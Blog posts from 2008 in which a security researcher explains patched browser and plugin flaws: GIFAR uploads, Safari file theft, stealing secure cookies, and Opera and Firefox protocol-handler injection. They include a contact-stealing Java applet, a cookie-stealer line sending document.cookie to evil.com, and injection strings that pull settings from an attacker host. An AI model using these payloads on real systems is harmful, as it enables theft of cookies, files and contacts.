Tuesday, December 16, 2008

SUN Fixes GIFARs

Last week, Sun released a patch for a vulnerability I reported to them.  The patch I’m talking about fixes the “GIFAR” issue.  I was unable to speak on the issue at Black Hat (for various reasons), but Nate McFeters did a great job of presenting the concept of GIFARs at Black Hat USA along with a simple example of how an attacker could use a GIFAR in an attack.  Now that the issue has been patched, I’d like to cover some of the things related to “GIFARs” that I thought were interesting (including a few items that were not mentioned at Black Hat).

Before we begin, I’d like to thank Chok Poh from Sun’s Security team.  Chok was vital in getting the GIFAR issue fixed; the patch required some significant thought as to how best to handle such an unusual issue, and Chok was very responsive and smart enough to understand its impact.  I’d also like to thank the Google Security Team.  Google was our “guinea pig” for testing some of the pieces related to GIFARs, and despite having to redesign some of their application behavior, they were gracious and worked diligently to protect their users.  Now, on to the show!

As shown by Nate at Black Hat, creating a GIFAR is simple: we just use the “copy” command on Windows or the “cat” command on *nix.  There are a few different places that talk about this technique (pdp has a great write-up), but I first learned of it from Lifehacker.com in this post.  Once the GIFAR is created, we examine the file in a hex editor.  The header of the file looks something like this:

header

The footer looks something like this:

Footer
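For reference, the concatenation itself is a one-liner (on Windows, something like copy /b image.gif + applet.jar evil.gif; on *nix, cat image.gif applet.jar > evil.gif).  If you'd rather script it, here's a rough Java sketch (filenames are hypothetical) that also shows why the trick works:

// Sketch only: a GIFAR is nothing more than a GIF with a JAR appended.
// GIF parsers read from the top of the file, while JAR (ZIP) parsers locate
// the central directory from the end, so each consumer finds what it expects.
import java.io.FileOutputStream;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;

public class MakeGifar {
    public static void main(String[] args) throws IOException {
        FileOutputStream out = new FileOutputStream("evil.gif");
        out.write(Files.readAllBytes(Paths.get("image.gif")));  // the GIF stays on top
        out.write(Files.readAllBytes(Paths.get("applet.jar"))); // the JAR rides along at the end
        out.close();
    }
}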

We now have a file that is both a valid GIF and a valid Java JAR.  We upload our GIFAR to our victim domain (in this case Google’s Picasa Web).  Google attempts to ensure the file is a valid GIF (which it is) and takes ownership of the GIFAR on their domain.  Once Google has taken ownership of the GIFAR, I can reference the applet on my attacking page via the APPLET tag.  I think the items above were well covered at Black Hat and it is these concepts that represent the essence of a generic GIFAR attack… but Google is smart and they understood the dangers of insecure content ownership before GIFAR, so let’s look at how we bypassed these Google-specific protections.

When we first examined the GIFAR we uploaded to Picasa Web, it wasn’t actually served from the google.com domain.  The actual domain it was served from was lh4.ggpht.com.  Below is a screenshot of the domain Google was using to serve the user-supplied images.

Google Alias

After some investigation, we realized that ggpht.com was actually an alias for google.com.  So, we could manually change our request from lh4.ggpht.com to lh4.google.com.

lh4.google.com

Bingo!  Now we are on a google.com domain!  From here, a lot of attackers begin to think “Java has raw sockets…”.  It’s one of the first avenues we approached, but we quickly discovered that raw sockets aren’t as useful as other techniques.  Instead of raw sockets, we chose to use Java’s HTTPUrlConnection object, for two very good reasons.  The first reason is that HTTPUrlConnection uses the browser’s cookies when making requests.  So, if our applet is stored on lh4.google.com and the user is signed into Google, we get to piggyback off the victim’s cookies.  We’ll get to the second reason in a bit.

httpurlconnection1

Even though we are now on the google.com domain, we still have a problem.  The Java Same Origin Policy allows the applet to connect back to the domain that served the applet (I’ve covered this behavior in previous posts).  Considering the applet was served from lh4.google.com, the attacker is allowed to use the applet to connect back to lh4.google.com and only lh4.google.com.  The problem is that lh4.google.com doesn’t store anything interesting.  This problem leads us to the second reason we chose the HTTPUrlConnection object.

Java’s HTTPUrlConnection object has a method named “setRequestProperty”.  Using setRequestProperty, we can set arbitrary HTTP headers for our GET and POST requests.  We use setRequestProperty to set the HOST header for the HTTP request, allowing us to “jump” from the lh4.google.com domain to any other google.com sub domain.  As a simple example, I had discovered a contact list at http://groups-beta.google.com/groups/profile/contacts?out=&max=500 (Google has since removed this contact list).  I set the URL object passed to the HTTPUrlConnection object to http://lh4.google.com/groups/profile/contacts?out=&max=500, and I set the HOST header to groups-beta.google.com.

host
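In code, the whole attack boils down to something like this (a rough sketch; the class name and error handling are mine, and setting the HOST header this way worked on the JREs of the time):

import java.applet.Applet;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;

public class ContactSniper extends Applet {
    public void init() {
        try {
            // The URL points at the host that served this applet, so Java's
            // Same Origin Policy check passes (and the victim's cookies ride along).
            URL url = new URL("http://lh4.google.com/groups/profile/contacts?out=&max=500");
            HttpURLConnection conn = (HttpURLConnection) url.openConnection();
            // ...but the HOST header routes the request to a different sub domain.
            conn.setRequestProperty("Host", "groups-beta.google.com");
            BufferedReader in = new BufferedReader(new InputStreamReader(conn.getInputStream()));
            StringBuilder contacts = new StringBuilder();
            String line;
            while ((line = in.readLine()) != null) {
                contacts.append(line).append("\n");
            }
            in.close();
            // "contacts" now holds the victim's contact list, ready to be shipped off-domain.
        } catch (Exception e) {
            // ignore in this sketch
        }
    }
}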

When the request is made, Java checks the value of the URL object to ensure the Same Origin Policy is enforced.  Since the domain of the URL object is lh4.google.com, everything checks out and Java lets the request through.  Once Google receives the request, it checks the HOST header to determine where the resource should be served from.  The HOST header specifies that the resource should be served from groups-beta.google.com, so despite the fact that the URL points to lh4.google.com, Google serves the contact list from groups-beta.google.com.  In this example, I stole a user’s contact list but it could have been any content from a number of Google sub domains.

All your contacts are belong to us

It’s easy to blame Java (Sun) for this issue.  After all, it was their JRE whose relaxed JAR parsing criteria allowed GIFARs to be passed as JARs.  In many respects some blame could be placed on Sun, but in my (humble) opinion, this is ultimately a web application issue.  When a web application chooses to take ownership of a user-controlled file and serves it from their domain, it weakens the integrity of the domain.  This isn’t the first time an image was repurposed like this: IE has had MIME sniffing issues with images, Flash had crossdomain.xml issues with images, and now we have GIFARs.  The impact of these attacks could have been minimized if the web applications that took user-controlled files had served those files from a “throw away” domain.  As an application developer, you can prevent these types of attacks by using a separate domain for user-influenced files.

Tuesday, November 18, 2008

Stealing Files with Safari

Apple recently patched a vulnerability that Nitesh "Leisure Suit" Dhanjani and I reported to them last week (CVE-2008-4216).  We had reported a similar vulnerability to Apple about two months ago (CVE-2008-3638).  In fact, the exploitation technique was so similar that we held off releasing details until this second patch was released.

The basic gist of this vulnerability pits a browser and a browser plug-in against each other in order to cross a subtle but important boundary.  The issue starts simply enough, with a victim visiting an attacker’s webpage.  Once the victim is on the attacker’s webpage, the attacker simply loads a Java applet.  Inside the applet is a call to getAppletContext().showDocument(URL);



getAppletContext().showDocument(URL) basically has the browser open a new browser window with the URL passed to showDocument().  Normally, browsers will not let remote sites open new browser windows which point to local files.  It seemed that Safari had some issues determining the specific “rights” for windows opened via Java applets and allowed getAppletContext().showDocument() to force the browser to open a file from the user’s local file system.
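A minimal sketch of such an applet (the local path here is hypothetical; planting content at that path is covered next):

import java.applet.Applet;
import java.net.MalformedURLException;
import java.net.URL;

public class WindowOpener extends Applet {
    public void start() {
        try {
            // Point the new window at content we've planted on the local file system.
            URL local = new URL("file:///C:/temp/planted.html");
            // Pre-patch Safari opened this without applying its normal remote-to-local checks.
            getAppletContext().showDocument(local, "_blank");
        } catch (MalformedURLException e) {
            // ignore in this sketch
        }
    }
}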

Now here is where things get interesting…  Opening a local file in the browser isn’t very useful unless we can open and render/execute content that we control.  There are a couple of ways to plant our content in a predictable location using Safari.  By default, Safari has a reasonably predictable location for cached/temporary files.  We can use these predictable locations to load our content; we’ll have some guessing to do, but it works…  Safari can also be forced to dump user-controlled contents to the “c:\temp” directory (on Windows, of course), which makes things far more predictable and the attack a lot less noisy.  I’m not sure if Apple considers the “c:\temp” issue a bug, but just in case they do, I won’t go over the details of the “c:\temp” trick just yet.

In case you’re wondering, Internet Explorer and Firefox use a random, 8-character directory name to prevent guessing of temporary file locations.

Once we’ve planted our contents in a predictable location, it’s simply a matter of having the Java applet call the file we’ve planted.  We have unlimited guesses to get the location and file name right, but the more guesses, the noisier the attack (obviously).  The file we’ve planted is an HTML file that loads an XMLHTTP object, which is used to steal files from the local file system.  You can include a <script src="http://attacker-server/remote-control.js"></script> if you want to remotely control the script running on the local file system.  Safari allows script to be executed from local files without warning, so once we get the right location and filename for our planted HTML file, files can be stolen off the local file system without user interaction or warnings.



Internet Explorer presents a warning before executing script from local files, and Firefox (as of Firefox 3) restricts XMLHTTP loaded from the local file system to the directory the HTML file was loaded from (and any subdirectories).



Once we have the contents of the file in JavaScript space, we simply encode the contents and POST them to our attacker web server.  There you go... Stealing Files with Safari!

Pwnichiwa from PacSec!

WOW, it’s been a busy couple of weeks!  I was in Tokyo last week for PacSec.  PacSec was a great time, there were some GREAT talks, and Dragos knows how to party!  I co-presented a talk entitled “Cross-Domain Leakiness: Divulging Sensitive Information and Attacking SSL Sessions” with Chris Evans from Google.  I’m curious if this was the first time in history a Google guy and a Microsoft guy got on stage together and talked about security...  Anyway, you can find the slides here.

Chris is a super smart guy and demo’d a ton of browser bugs, most of which he will eventually discuss on his blog (which you should check out).  I had a chance to demo a few bugs and went over some techniques to steal Secure Cookies over SSL connections for popular sites.  Now, before I get into the details of the Safari File Stealing bug that was recently patched (provided in the next post) I did want to talk a bit about WebKit.

<WARNING Non-Technical Content Follows!>

You were warned!  Some friends and I have been playing around with Safari (we've got a couple of bugs in the pipeline).  As everyone knows, Safari is based on the WebKit browser engine.  I think WebKit is a great browser engine, and apparently so does Google, because they use it for Google Chrome.  So, once I discover and report a vulnerability in Safari for Windows, Apple must also check Safari for Mac and Safari Mobile for iPhone.  Additionally, “someone” should probably let Google know, as their Chrome browser also takes a dependency on WebKit.  Now, who is this “someone”?   Is it the researcher?  Is it Apple?  Does the researcher have a responsibility to check whether this vulnerability affects Chrome?  Does Apple have a responsibility to give Google the details of a vulnerability reported to them?  Our situation works today because we’ve got great people working for Apple and Google (like Aaron and Chris) who have the means to cooperate and work for the greater good.  However, as security moves higher and higher on the marketing scorecards and becomes more and more of a “competitive advantage”, at what point will goodwill stop and business sense take over?

Let’s contemplate a scenario that isn't so black and white…  Let’s say two vendors both take a dependency on WebKit.  An issue is discovered, but the differences in the two browsers make it so that the implementation for the fix is different.  Vendor A has a patch ready to go, Vendor B on the other hand has a more extensive problem and needs a few more days/weeks/months.  Should Vendor A wait for Vendor B to complete their patch process before protecting their own customers and pushing patches for their own products?

Let’s flip the scenario… Let’s say Vendor A has a vulnerability reported to them.  Vendor A determines that the issue is actually in WebKit.  Vendor A contacts Vendor B and discovers that Vendor B isn’t affected… does this mean Vendor B knew about the issue, fixed it, and didn’t tell Vendor A?  Did they have a responsibility to?

Tuesday, October 21, 2008

House Keeping

It’s been a crazy couple weeks! Some quick housekeeping:

ChicagoCon – I’ll be in Chi-Town next week giving one of the Keynotes at ChicagoCon. If you’re going to be in the area, hit me up and we’ll grab a few drinks.

Bluehat - I’m glad to see all the young blood in the scene. It’s going to be scary to see what Kuza55 and Sirdarckcat are up to in 10/15 years (they’re already tearing stuff up as it is…). As for us old guys, we can’t drink like we used to… but we still try :)  As usual, the Bluehat parties ROCKED and it was great meeting everyone.  We topped off all the Bluehat debauchery with a night at the shooting range, shooting AR-15s and various handguns…

MBA - I actually took a midterm during the WAF discussion panel at Bluehat (no wonder I was soooo quiet). Once this class is over, I’ll have 3 more classes to go and I’ll have completed my MBA! The coursework isn’t too bad, but the time commitment is pretty high. It definitely cuts into my “pwnage time” and I can’t wait till it’s all over. Don’t ask me why I need another Master’s degree and don’t ask me how many times I’ve XSS’d my online class discussion forums. I promise to practice responsible disclosure after my classes are over... but for now, it’s the only thing that keeps class bearable :)

Grey Goose - This was an AWESOME project and I’m glad Jeff Carr asked me to participate. Jeff basically assembled enough intel brainpower to rival the intel agency of a small country. Jeff put out a couple of reports and if you need more info on the project, you can find it here. I studied warfare as an Officer in the Marine Corps (Maneuver and Expeditionary) and I'm interested in anything related to cyber warfare. We’re living in a time when the tactical, operational, and strategic thinking surrounding cyber warfare is being defined.  We can already see striking similarities between cyber capabilities and air power. Just as air power added a new dimension to modern warfare, so do cyber capabilities. Many typically view Computer Network Attack (CNA) and Computer Network Exploitation (CNE) as solitary events, but they can also be used in “combined arms” scenarios (much like targeted air strikes vs. close air support).  One day, doctrine related to cyber warfare will be required reading for young military officers, just like Sun-tzu, Clausewitz, and Jomini.

Apple Pwnage – Nitesh and I reported a vulnerability to Apple (CVE-ID: CVE-2008-3638). I’ll go over the details on the blog as soon as some loose ends get tied up.

Win7 – I finally took the advice of Rob Hensing and Dave Weston and switched to Win7 as my primary OS…. So far, it absolutely ROCKS.

Great talk by a respected haxor.... http://video.google.com/videoplay?docid=-1012125050474412771&hl=en

Tuesday, September 23, 2008

Surf Jacking Secure Cookies

I was thinking back to Sandro’s paper on Surf Jacking and I realized that there was one small caveat where the “Secure” flag wouldn’t protect your cookies from Surf Jacking…

The Side Jacking and Surf Jacking techniques basically stipulate that the attacker has to be on the same network segment as the victim (you have to be able to sniff the traffic in order to see the cookie go by on the network)… So I’ll stipulate the same.

Say I go to https://xs-sniper.com and xs-sniper.com sets a cookie, but sets it with the “Secure” flag.  An attacker could eventually force my browser to load a non-secure version of xs-sniper.com (http://xs-sniper.com) in an attempt to force my session cookie to travel in the clear so they can sniff the cookie as it goes by (this is a simplified description of Surf Jacking).  Now, if all my cookies are set secure, my cookies won’t travel over the wire in the clear…  I’m safe… right?

Not so fast…  If the application sets all the cookies with the secure flag, BUT the web application also has a “script src” tag pointing to an insecure location (http://), then you can STILL STEAL THE COOKIE, even if it’s marked secure.   Let me explain…

If an attacker is on the same network segment as you, not only can they sniff clear-text data (http://), they can also INJECT data as it traverses the network.   Let’s say I have a page on xs-sniper.com that does analytics for my web application.  We’ll name this page http://xs-sniper.com/analytics.html.  This page is meant to be served as http:// and contains no sensitive data, but if a user makes a direct request for https://xs-sniper.com/analytics.html, the page is still served.  Inside the page’s HTML is a script src tag that looks something like this:


<script src="http://myanalytics.com/webbugs.js"></script>


Now, using the surf jack technique, Sandro redirected the victim to an http:// version of the targeted site.  In our case, redirecting to an insecure version of the site doesn’t help us, as all the cookies are set SECURE.  Instead, we’ll redirect to an https:// page on our victim domain that contains an insecure script src tag like the one shown above (https://xs-sniper.com/analytics.html).  Once we see the request for the insecure JavaScript file (webbugs.js), we can inject our own JavaScript cookie-stealing payload (as the script src request is made in the clear):


CookiesStealer = new Image();

CookiesStealer.src = "http://www.evil.com/stealer.jpg?"+document.cookie;


The injected script is executed by the page that loaded it and gives up the cookies for the domain, even if they are marked secure.  There you go… Secure cookies stolen.

Without warning or prompt, every browser I tested allowed an https:// page to load a script src from an insecure http:// location.  Ok... I lied... every browser EXCEPT ONE... can you guess which lonely browser provided a warning before allowing an https:// page to load a script from an http:// location?  You can find the answer here.  For those of you in disbelief, you can test your favorite browser(s) here.

SIDENOTE: HTTP pages that call document.cookie will NOT have access to SECURE cookies… well at least in the browsers that I checked... that's pretty cool...

CLARIFICATION ON SIDENOTE: From my tests (which only covered a few browsers) it seems that the document.cookie object called from an http:// page WILL NOT contain secure cookies (this is a GOOD thing). So, if I were able to inject a full http:// page and called document.cookie, the secure cookie would be missing. This is why I needed to call an https:// page with a script src that loaded an insecure script file.

Sunday, September 14, 2008

Hostile Hotel Networks?!?!

Dark Reading recently had an interesting article related to the security of Hotel networks; you can find the article I'm talking about here.

As I read the article... I couldn't help but smile... the article made it seem like hotels have horribly insecure networks!  The truth is, THEY DO… along with airports, coffee shops, bookstores, and pretty much ANY PLACE that offers up connectivity!

Some people fail to understand that when you join ANY network, you’re trusting that everyone on the network is playing nicely.  Many of the protocols that enable our network connectivity WERE NOT DESIGNED TO SECURELY SUPPORT THE SCENARIOS WE DEMAND TODAY.  Take, for example, Address Resolution Protocol (ARP).  ARP is the one protocol that really makes me paranoid.  The details of how ARP works and how it can be used to do evil are way beyond the scope of this post, but you can find some good information here, here, and here.

The ARP abuses I'm most interested in are ARP Poisoning attacks.  These attacks basically allow me to Man-in-the-Middle (MITM) network connections, typically from a victim’s machine to their gateway.  Now, ARP poisoning attacks have one MAJOR drawback (from an attacker standpoint): they typically require the victim to be on the same network as the attacker (in layman’s terms).  Ask yourself this question.... why would I ever join an un-trusted network and possibly subject myself to such attacks? 

Surprisingly, people join un-trusted networks all the time.  If you've ever associated to a wireless access point at a coffee shop, hotel, bookstore, or an airport.... you've joined an un-trusted network… IT’S THAT SIMPLE.  Just because the SSID and the welcome page have a familiar name/logo that you trust, THAT DOESN’T MEAN THAT YOU CAN TRUST EVERYONE ELSE CONNECTED TO THAT NETWORK, and if you can’t trust everyone connected to the network, then you’ve got yourself an un-trusted network.  Now, MITM on “secure” connections (SSL aka HTTPS) usually causes a warning to appear (every major browser has this protection mechanism in place), and while I haven’t seen any studies on click-through rate, I would guess that it’s pretty high.





Airports are a PRIME target for MITM, as they are typically filled with people using the available wireless access points to do business.  Many of these people are not technically savvy and, more importantly, THEY ARE IN A HURRY, which leads them to push past warning message after warning message in order to "get this out before my plane leaves!"  If someone wanted to harvest a TON of sensitive information (creds to banking accounts, usernames, passwords, emails... everything you can possibly imagine), all they would have to do is connect to the airport wireless network, ARP poison every host they see... and let the creds roll in.  It's that simple... trust me...  I've seen it firsthand...  I can guarantee that you'll have someone’s creds within 5 minutes...

Security pros will argue, “you can use a VPN” and they are right.  If you are a corporate user, you shouldn’t even THINK about sending anything through an external, un-trusted network unless it’s through the VPN… but what about the home user?  What about mom and pop, traveling on vacation… where is their VPN?  Judging from the success of these attacks, even if a stern warning is presented, many users just ignore the warnings and continue on their merry way.  Scores of software will silently ignore certificate warnings, happily passing information onto a suspect host.  Besides, those warnings are only displayed when encryption is in play, so that unsuspecting user that is browsing their webmail over HTTP gets their session stolen without warning.  It's truly amazing how noisy our computers have become, spitting out all sorts of info... trusting that everyone else on the network is playing nicely.

Let’s say you understand the risks of MITM and you have to email something out before your plane leaves.  You attempt to connect to your VPN server and you see a certificate warning.  You suspect that someone may have an MITM against you using ARP Poisoning... what can you do to protect yourself and still get the email out?

Monday, September 8, 2008

Simple Lesson on Secure Cookies

I recently read a paper written by Sandro Gauci from Enable Security entitled "Surf Jacking - HTTPS will not save you". You can find the paper here.

It's an interesting read and extremely relevant to today’s web applications.  The heart of the paper describes some simple tricks to force a session cookie to be sent over an unencrypted channel.  These tricks are possible if the secure flag isn’t set for the session cookie. These types of attacks have been discussed before; Side Jacking is probably the most well-known (and most widely used) attack against leaked cookies.

<RANT> It bugs me that we’re still dealing with issues like this.  Despite having a simple and effective means to ensure that session cookies are only sent over secure channels, application owners choose to ignore the secure (and HTTPONLY) flags when developing their applications.  Later, as the application matures, developers find that their application has taken a significant dependency on this insecure behavior, and what was once a simple fix now becomes a huge design change (which equals $$$).  The true victims of these poor security decisions are the users, who are left scratching their heads when their accounts get pwnd while using the WiFi at Joe's Coffee Shop. </RANT>

I believe the secure flag is symbolic of the current state of web application security… the countermeasures to the issues we are facing are known, simple, and effective... yet we continue to struggle with wide-scale implementation because we've taken dependencies on insecure behavior.  SSL certs are another great example of this.  Every major browser has a way to bypass the security provided by SSL certs.  Browsers MUST offer this bypass because if they didn't, it would break the web... but I digress.

There is a bright spot when it comes to protecting cookies.  Cookies are stored and protected by the browser (as any decent web app hacker should know!).  So, when an application server issues a "SET-COOKIE" header, it's merely a recommendation as to how the browser should use the cookie.  Each cookie is maintained by the browser, and all the flags (secure, path, domain, httponly, expires... etc.) associated with cookies are enforced ENTIRELY by the browser.  So, if an application server sets a cookie WITHOUT the secure flag, I can tell my browser to disregard the server's recommendation and add the secure flag, which ensures that the cookie will only be sent over secure channels.  This is really simple stuff, so seasoned web app hackers can stop here. Everyone else can continue reading.

I've set up a page here that simply sets a cookie in the following manner:

Set-Cookie: XSSniper=BKRios; expires=CURRENTDATE
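For contrast, a hardened version of the same header would add the protective flags explicitly, something like this:

Set-Cookie: XSSniper=BKRios; expires=CURRENTDATE; secure; HttpOnly

My server, of course, will never send that version; that's the point of this exercise.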

Examining the cookie in Firefox shows the following:

Bad Cookie!

As you can see, we have a cookie named XSSNIPER and the SECURE flag was NOT set by the server.  In fact, my server will NEVER set the secure flag for the XSSNIPER cookie.  Now, if I want to force my browser to enforce the secure flag for the XSSNIPER cookie, I can do so by entering the following JavaScript into the address bar.

javascript:var cookies=unescape(document.cookie);var split=cookies.split(";");for (i = 0; i <split.length;i++){document.cookie=split[i]+";expires=Thu,1-Jan-1970 00:00:00 GMT;";document.cookie=split[i]+";secure;"}document.location="http://xs-sniper.com/blog";

The JavaScript above expires all of the current cookies (only on the client side; if you had a session established with the server, it would still be maintained) and sets every cookie for the current domain to secure.  I realize the JavaScript is pretty ghetto, and this should ideally be handled by the application, but we could also use a browser plugin with a nice UI and fine-grained control over each cookie attribute... Hmmmm, a tool to prevent Surf/Side Jacking attacks... I wonder what I would call it... Any ideas, Nate?

After we run the Javascript, we can take another look at the Cookie info presented by Firefox:

Secure Cookies for everyone!

As you can see, the cookie will only be sent over encrypted connections and the cookie now expires at the end of the session (no more persistence).  We've turned the XSSNIPER cookie into a SECURE cookie, despite the fact that the server never specified this behavior.

Now, this approach does have its cons... Servers typically recommend a particular cookie setting because the application was designed to work with/anticipate/depend on those characteristics.  This will probably break some application functionality, but broken functionality will show you exactly where your cookie would have been leaked :)

Wednesday, September 3, 2008

IE8b2 XSS Filter

I run a number of different browsers, for various reasons.  I was once even called a “browserholic” by a colleague!   I pulled down IE8b2 when it went live a week ago.  I don’t want to talk about the myriad security features or browsing features, as I think they’ve been covered in detail by many different sources, but I do want to mention one security feature… XSS Filter

XSS Filter was created by David Ross… he’s one of the smartest guys I’ve ever met.  In addition to being super smart, there is a certain boldness needed to take the lead in developing Internet Explorer’s built-in defense for the bane of the web.  David asked a number of security pros around the world to take a look at XSS Filter and I’m honored to have been asked to help.  You can see some of the names of those who participated in XSS-Filter’s creation here.


Thanks David and CONGRATS on the release!


Some technical details with regards to XSS-Filter can be found here.

Thursday, August 21, 2008

Opera Stuff - Followup

It always takes me a few weeks to work the booze out of my system after Blackhat and Defcon... but on with the show...

 

Opera 9.52 was released a few days ago...  I hope you've upgraded!  Working with the Opera Security Team was a pleasure.  I think they have the most creative way of tracking each bug (by email address) and they were VERY responsive. 

 

A while back, I reported an issue to the Opera Security Team about some Opera protocol handling abuse I came across.  You can read the initial advisory here.  When the initial advisory went out, the Opera Security Team asked me to hold off on the details until they published a follow-up advisory, which can be found here.  Since the issue is patched and the second advisory is out, let's go over the details:

 

First of all... this is a cross application issue (I think Blended Threat is the sexy term being used these days).  We'll use a protocol handling "aware" application to launch these attacks against Opera.  Opera just has to be installed someplace on the victim's machine for this to work.

 

When a user installs Opera, the following protocol handler is registered:

 

Opera.Protocol  "C:\Program Files\Opera\Opera.exe" "%1"

 

Which means... when I call Opera.Protocol://test, the following basically gets passed to the command line (this is a simplified explanation, but hey... I'm a simple guy):

 

c:\Program Files\Opera\Opera.exe "Opera.Protocol://test"

 

Knowing this, and determining that no internal check is done to distinguish between protocol handling and command line access, we are free to inject arbitrary arguments, which will be passed to Opera.  In the first example, we will inject the location of a local HTML file.  When the HTML file is loaded, a warning will be presented to the user, but the contents will be rendered regardless of the user's decision.  The protocol handling string we use looks like this:

 

<iframe src =  'opera.protocol:www.test.com" "file://c:\test.html '>

 

which ends up executing the following:

 

c:\program files\opera\opera.exe "opera.protocol:www.test.com" "file://c:\test.html"

 

If we can somehow place an HTML file in a known location, this would be bad.  For argument's sake, let's assume Nate McFeters didn't figure out a way to drop arbitrary content to a known location a few days ago (did I say that out loud?)... what else can we do?

 

Taking a look at the command line arguments supported by Opera, we see a couple of interesting items... one of which is the "/settings" argument.  The "/settings" argument allows Opera.exe to be loaded with an arbitrary INI file.  A quick examination of what's contained in an Opera INI file shows that if we can control the contents of the INI file, then we can control: cache directories, debugging mode, proxy settings, script execution, Java behavior, whether items are automatically RUN after downloading... the list goes on and on...

 

<iframe src =  'opera.protocol:www.test.com" /settings "//attacker-ip/ini-file.ini '>

 

which will result in something like this:

 

c:\program files\opera\opera.exe "opera.protocol:www.test.com" /settings "//attacker-ip/ini-file.ini"

 

OUCH....Thankfully... the Opera Security Team has fixed this particular issue!  Kudos to them!

Sunday, July 20, 2008

A Look at MFSA 2008-35

As promised... a quick look at MFSA 2008-35.

 

When Firefox is installed, it registers the following protocol handlers:

  • Gopher://

  • FirefoxURL://


gopher is cool!

Note: Firefox 3 no longer registers the Gopher protocol handler, which is a great security decision.

 

Both of these protocol handlers point to Firefox.exe in the following manner:

  • "C:\Program Files\Mozilla Firefox\firefox.exe" -requestPending -osint -url "%1"


When Gopher:// or FirefoxURL:// are called, the arguments are passed to the “%1” portion in the string shown above.  For example, gopher://test will result in the following: 

  • "C:\Program Files\Mozilla Firefox\firefox.exe" -requestPending -osint -url "gopher://test"


Knowing that we have absolute control over the -url argument being passed to Firefox.exe, we can use the “|” character to pass multiple, arbitrary URLs to the -url argument.  Firefox has protections that prevent remote web pages from redirecting to file:// and chrome:// content, but in this instance we are passing the URLs via protocol handler.  When arguments are passed via protocol handler, it’s essentially as if we are passing the -url argument to Firefox.exe via the command line.  So, thanks to the protocol handlers, the file:// and chrome:// restrictions can be bypassed.  This is done in the following manner:

  • gopher:test|file:c:/path/filename

  • gopher:test|chrome://browser/content/browser.xul


Note: It is also possible to pass “javascript://” URIs to Firefox.exe, but javascript URIs passed via the command line will be loaded in the context of about:blank.  This is a great security decision on behalf of Mozilla and saved them from having a standalone sploit.

 

Now that we have the ability to load local content via the protocol handlers registered by Firefox, we must find a way to plant attacker-controlled content in a known location.  There are a couple of ways to do this, but I’ll keep it simple (and responsible) and use the recently patched Safari “Carpet Bomb” attack as an example.  When Safari encountered an unknown content type, it would download the content of the file to the user’s desktop.  This gives us a semi-known location, as we’ll have to guess the username.  We can send a LOT of guesses for the username, as demonstrated below. 

  • <html><body><iframe src="gopher:file:c:/path/filename|file:c:/path/filename2|file:c:/path/filename3....>


There are other methods that don’t involve guessing the username, but I won’t go into that (remember, it’s the kinder, gentler BK!).

 

So, if a user is browsing the web with Safari and has Firefox installed, I could plant an HTML file with JavaScript (XMLHTTP) onto the user’s desktop.  Once the content is planted, I can launch the gopher:// protocol handler (gopher is launched by Safari without user consent) and point Firefox.exe to the local content.  When Firefox loads the local content, the XMLHTTP request has access to the entire user file system (as the script was loaded from the local file system). 

 

Firefox 3 has implemented security measures to prevent arbitrary file access and limits the XMLHTTP request to the currently loaded directory (and possibly subdirs?), which is a great security decision. 

 

On a side note, IE warns users when active script is about to be run from the local file system.  I believe the IE warning message states, “you are about to do something REALLY stupid… do you wish to continue?” … or something like that.  This is a great security decision on behalf of IE.

 

 

 

The scenario presented above demonstrates how someone with Safari and Firefox installed could get their files stolen, but Mozilla understood that the behavior of their software could be abused by other software (not just Safari), just as Apple understood that dropping files to a user’s desktop (without consent) could be abused by other software as well (not just IE or Firefox).  Both vendors did what was right and adjusted the behavior of their software.  Thanks Mozilla and Apple!

 

These types of issues interest me because they represent the difficulties in securing real-life systems, systems that have software from multiple vendors interacting with each other, depending on each other to make the right security decisions.  In isolation, these issues may not be of any concern, but together they create a situation where the security measures of one piece of software are bypassed because of the seemingly innocuous/insecure/stupid behavior of another, seemingly unrelated piece of software.  From what I understand, Mark Dowd and Alexander Sotirov plan to give some INSANE examples of this at Blackhat…  I’m looking forward to the talk!

Wednesday, July 16, 2008

FireFox Vulns - MFSA 2008-35

Mozilla issued a patch related to an issue I recently reported to them.  The MFSA with details on the issue can be found here.  It's an interesting issue that demonstrates some of the complexities related to interaction between software from different vendors.  This particular issue makes use of one of my favorite attack vectors: protocol handlers.  The protocol handlers involved in this situation create an opportunity to pass "a command-line URI with the pipe symbols" from a remote webpage to Firefox.exe.  For those that are interested, I'll provide a small writeup on the issue this weekend.  For those waiting, I'll also provide a writeup on the Opera protocol handling issue leading to RCE when the Opera team is ready.

 

It's a crazy coincidence that the Firefox and Opera vulnerabilities come almost one year to the day after Nate McFeters and I reported the original firefoxurl and mailto protocol handling vulnerabilities... and I use the term "reported" loosely :).  Nate and I have changed over the past year... we're both older and fatter, but it seems that protocol handlers continue to be as vulnerable as ever.

 

In closing, I want to thank the Mozilla Security Team (Dan Veditz in particular) and the Apple Security Team for working with me on this issue.  It would have been easy for them to point fingers at the other organization, but both teams took responsibility for their portion and committed to changes.  Thanks guys!  I'll buy the beers in Vegas!

Friday, July 11, 2008

Opera Stuff

I recently came across an issue in Opera that could allow for some bad stuff.  Although the issue has been addressed, I've been asked by the Opera security team to hold off on details until they can fully investigate other possibly related issues.  I'll respect that request.  I do, however, want to take a moment to thank the Opera team for their timely response!  Change control, resource allocation, and devoting the appropriate amount of testing to patches for sophisticated applications is a tricky business.  The Opera team responded quickly with a patch and kept in great contact with me throughout the process.

 

It's a crazy world out there and the web browser is the window to the wild wild west.  I wish the Opera security team the best of luck!

Married in Maui!



I've been in Maui for the last two weeks and it was AWESOME.  My girl and I had our wedding ceremony on a beach in Kihei and our reception "upcountry" in Kula.  It was great being back on the islands, catching up with friends and family. 

 

For some reason, I feel energized... Maybe it was the Hawaii sun, or maybe all those late-night hacking sessions were finally catching up... or maybe I'm just getting old :p ... but I feel good now! 

 

I was pretty much offline the entire time, so if you've sent me an email within the past week, I'll eventually catch up and respond.  Otherwise, I'll SEE YOU IN VEGAS!!!

Saturday, June 21, 2008

Clarification for "BK on Safari, hunting Firefox…"

Is Safari 3.12 affected by the vulnerability you mention in "BK on Safari, hunting Firefox"?  The “carpet bomb” behavior COULD have been used in conjunction with Firefox to steal user files.  This specific scenario has been patched.

 

Can an attacker use other, non-obvious ways to abuse the Safari (3.12)/Firefox interaction to steal files from the local file system?  Yes, I know of three separate methods to accomplish this (Firefox 3 lessens the risk).  Vendors have been informed and no details will be provided to the public.  Don't ask for additional details; I won't give them until all this is straightened out.

 

